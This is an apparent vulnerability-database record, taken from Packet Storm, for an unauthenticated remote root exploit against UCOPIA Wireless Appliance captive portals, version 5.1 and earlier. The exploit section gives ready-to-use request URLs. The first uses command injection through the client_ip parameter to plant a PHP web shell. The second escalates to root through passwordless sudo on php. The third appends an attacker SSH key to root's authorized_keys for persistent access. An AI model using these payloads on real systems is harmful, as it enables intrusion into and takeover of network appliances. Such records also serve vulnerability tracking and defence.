ID

VAR-E-201710-0359


TITLE

UCOPIA Wireless Appliance 5.1 Code Execution

Trust: 0.5

sources: PACKETSTORM: 144506

DESCRIPTION

UCOPIA Wireless Appliance versions 5.1 and below suffer from a captive portal remote root code execution vulnerability.

Trust: 0.5

sources: PACKETSTORM: 144506

AFFECTED PRODUCTS

vendor:ucopiamodel:wireless appliancescope:eqversion:5.1

Trust: 0.5

sources: PACKETSTORM: 144506

EXPLOIT

# Exploit Title: Unauthenticated remote root code execution on captive portal Ucopia <= 5.1
# Date: 02/10/17
# Exploit Author: agix
# Vendor Homepage: http://www.ucopia.com/
# Version: <= 5.1
# Don't know in which version they exactly fixed it.
# When you connect to Ucopia wifi guest, every requests are redirected to controller.access.network

# First create easier to use php backdoor
https://controller.access.network/autoconnect_redirector.php?client_ip=127.0.0.1;echo%20'<?php system($_GET[0]);%20?>'>/var/www/html/upload/bd.php;echo%20t

# As php is in sudoers without password...
https://controller.access.network/upload/bd.php?0=sudo%20/usr/bin/php%20-r%20%27system("id");%27

# Just push your ssh key and get nice root access (ssh is open by default even from wifi guest)
https://controller.access.network/upload/bd.php?0=sudo%20/usr/bin/php%20-r%20%27system("echo%20ssh-rsa%20AAAA[...]%20>>%20/root/.ssh/authorized_keys");%27

Trust: 0.5

sources: PACKETSTORM: 144506

EXPLOIT HASH

LOCAL

SOURCE

md5: 030235cff7891b7fb5266503f44d6d01
sha-1: f2dbbc32985e76dca94627237766a78b4157c439
sha-256: ae7e8abc8f16b10dadca2659c059cf8776f3ea99ee39848e71339f94e098c220
md5: 030235cff7891b7fb5266503f44d6d01

Trust: 0.5

sources: PACKETSTORM: 144506

PRICE

free

Trust: 0.5

sources: PACKETSTORM: 144506

TYPE

root, code execution

Trust: 0.5

sources: PACKETSTORM: 144506

TAGS

tag:exploit

Trust: 0.5

tag:remote

Trust: 0.5

tag:root

Trust: 0.5

tag:code execution

Trust: 0.5

sources: PACKETSTORM: 144506

CREDITS

agix

Trust: 0.5

sources: PACKETSTORM: 144506

EXTERNAL IDS

db:PACKETSTORMid:144506

Trust: 0.5

sources: PACKETSTORM: 144506

SOURCES

db:PACKETSTORMid:144506

LAST UPDATE DATE

2022-07-27T09:51:38.934000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:144506date:2017-10-05T03:06:20